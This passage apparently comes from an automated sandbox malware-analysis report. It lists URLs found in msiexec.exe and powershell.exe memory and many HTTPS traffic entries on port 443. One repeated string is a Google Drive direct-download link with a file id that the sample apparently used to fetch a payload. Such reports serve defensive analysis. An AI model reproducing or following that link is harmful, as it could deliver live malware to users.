msiexec.exe, 00000008.00000003.2619520650.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2630558630.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3035039238.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3046207658.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/&
      Source: msiexec.exe, 00000008.00000003.2767526641.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836951990.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/(E
      Source: msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3070442102.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767470543.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3093480353.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3059027146.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3191014204.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965651967.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2619520650.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2630558630.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3035039238.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3046207658.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965683282.0000000007677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/3
      Source: msiexec.exe, 00000008.00000003.2767526641.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2734019365.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/8F
      Source: msiexec.exe, 00000008.00000003.2767526641.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2734019365.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791709924.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757289437.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2873005207.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711361558.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814424080.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836951990.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803545338.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/PE5$
      Source: msiexec.exe, 00000008.00000003.2607825017.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2607772288.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravz
      Source: msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
      Source: msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download;
      Source: msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadAj
      Source: msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadS1
      Source: msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadU
      Source: msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767470543.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2653986406.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665575556.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2744986584.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676459479.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687998730.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780341301.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2733970242.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2757239384.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699591387.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2699646259.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2711317348.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2665544248.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadUn
      Source: msiexec.exe, 00000008.00000003.2860464156.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848899256.0000000007673000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2836916094.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadis
      Source: msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadt9
      Source: msiexec.exe, 00000008.00000002.3378923875.00000000075FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=downloadu4
      Source: msiexec.exe, 00000008.00000003.2653986406.0000000007679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/o
      Source: msiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/oft
      Source: msiexec.exe, 00000008.00000003.3168312136.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3168346621.0000000007676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/u
      Source: powershell.exe, 00000002.00000002.2511889664.0000000004A96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2514289224.00000000059A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: msiexec.exe, 00000008.00000003.2767526641.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318326115.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3237785223.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3295276947.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179890641.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676459479.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573778561.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318360888.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965523357.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: msiexec.exe, 00000008.00000003.2757239384.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/eleme
      Source: msiexec.exe, 00000008.00000003.2930909039.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3157176290.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3012230458.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2733926611.00000000076B2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: msiexec.exe, 00000008.00000003.2989713394.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2989745617.0000000007677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;re
      Source: msiexec.exe, 00000008.00000003.2744986584.0000000007674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;rep
      Source: msiexec.exe, 00000008.00000003.2930909039.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3157176290.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3012230458.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2733926611.00000000076B2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: msiexec.exe, 00000008.00000003.2930909039.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3157176290.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3012230458.0000000007676000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2733926611.00000000076B2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2860522362.0000000007658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: msiexec.exe, 00000008.00000003.2619442819.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767526641.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.000000000766F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2734019365.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562480092.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767526641.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318326115.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3237785223.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3295276947.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179890641.00000000076B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: msiexec.exe, 00000008.00000003.2767526641.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318326115.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3237785223.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3295276947.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179890641.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676459479.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573778561.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318360888.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965523357.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: msiexec.exe, 00000008.00000003.2767526641.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318326115.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3237785223.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3295276947.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179890641.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722361589.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676459479.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3378923875.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2791680358.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573778561.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2722390506.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318360888.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2965523357.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2825974381.0000000007671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 00000008.00000003.2619442819.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2676392370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767526641.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2848954524.000000000766F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3000645370.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2780411349.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2803508596.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2734019365.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2562480092.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2767526641.0000000007666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687950129.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2596566496.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2573550083.0000000007679000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2919029347.0000000007677000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2745021226.0000000007658000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2814375929.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3318326115.0000000007671000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3237785223.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3295276947.00000000076B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3128192594.0000000007674000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3179890641.00000000076B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
      Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
